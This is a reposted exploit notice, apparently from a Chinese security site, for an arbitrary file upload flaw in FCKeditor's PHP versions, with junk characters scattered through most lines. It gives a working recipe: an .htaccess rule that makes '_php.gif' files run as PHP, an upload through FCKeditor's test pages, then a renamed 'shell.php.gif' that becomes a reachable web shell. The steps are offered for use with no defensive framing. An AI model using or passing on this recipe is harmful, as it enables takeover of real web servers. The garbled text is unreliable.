FCKeditor所有php版本Upload上传漏洞% q F' L" ^7 p' \8 t
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07* D" L' e1 ^5 I6 B
减小字体 增大字体$ w" A7 E* H2 E: \' O+ y
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
$ H4 s, S% u! z5 i6 V2 s! C[+] Date: 2011# p( ^- S: F3 G
[+] Author : sinesafe.cn
) H O( ?: Q( O5 ~7 _[+] Website : WwW.sinesafe.cn6 j# y% p& E+ o
———————————————————
: t# n0 a$ m- R1.create a htaccess file:
) [" v6 _3 C& V4 A; ]( @, u; N' Mcode:
4 B+ {$ m W3 b, X) [1 |( A- t<FilesMatch “_php.gif”> _$ I' k7 p! o# U- R9 C
SetHandler application/x-httpd-php( g. R6 ^" l' W0 Q) u* H
</FilesMatch>
9 @: w/ d5 p) r" k6 r% R. n$ |6 U2 D# i4 Z4 ]4 h! M! R
2.Now upload this htaccess with FCKeditor.3 r) F. p5 }( W0 I6 r8 _
6 o; b8 b% M# a3 I/ ^7 Hhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html& @- e' a! w8 _; f& ^
; q- P& C! m5 \; F1 K! r" d
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
) J% R- E* O3 U. L- N* t
0 @; j8 O$ D2 _. v# s; W———————————————————————————————-
& b* w4 U6 P) b1 p3.Now upload shell.php.gif with FCKeditor.
/ R; O4 t2 H. Q7 Y. Z a' E5 _8 h4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
' f- h8 Z/ ?# Q* J- u5.http://www.sinesafe.cn/anything/shell_php.gif
8 o. }8 t9 f3 H3 D6.Now shell is available from server. |
1 `; `' H( |. C0 e8 D( l2 B
0 r0 m7 [# @8 u6 o7 I& u; _
, t6 F6 z2 e( X) l' A4 { |
发表于 2013-10-27 17:25:21
收藏
支持
反对